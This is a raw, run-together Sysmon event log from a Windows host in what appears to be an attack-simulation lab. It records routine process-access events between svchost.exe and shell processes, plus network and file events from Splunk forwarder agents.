13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200741Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200740Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200739Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200738Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200737Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200736Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200735Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200734Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200733Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200732Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200731Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200730Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200729Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200728Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200727Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200726Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200725Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200724Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200723Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200722Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200721Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200720Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200719Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200718Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200717Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200716Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200715Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200714Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:09.179{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000002200713Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:04.563{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55152-false10.0.1.12-8089- 23542300x80000000000000002200749Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:10.554{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B26FDA3D63FF83ADABA74DD2001C38F,SHA256=0E133043D27723F00CD9484DBA06A6F86B212793182367DEBE063B1CF4D4808C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200748Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:10.179{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C6A8F72A24150BA7D64E0DA1F793B398,SHA256=7742079416155B309208E67D3CFF19556ABA31164DBCB2A840986AE9D14E50FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200751Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:11.663{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA57A43E7A2DEFA2632425FF412A43A3,SHA256=55ED2CAD1501C8BC97FA777E9701044DA1F9C383CD0CF0881FCC9C483F097000,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200750Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:06.954{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55153-false10.0.1.12-8000- 23542300x80000000000000002200753Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:12.679{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2FBAAD3F4D919A00BDD7F8EBE209787,SHA256=6E18C6AD40ECFC8B43EE49DCE3D984BA380EA4BC315D5D07EEB468C9F1188883,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200752Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 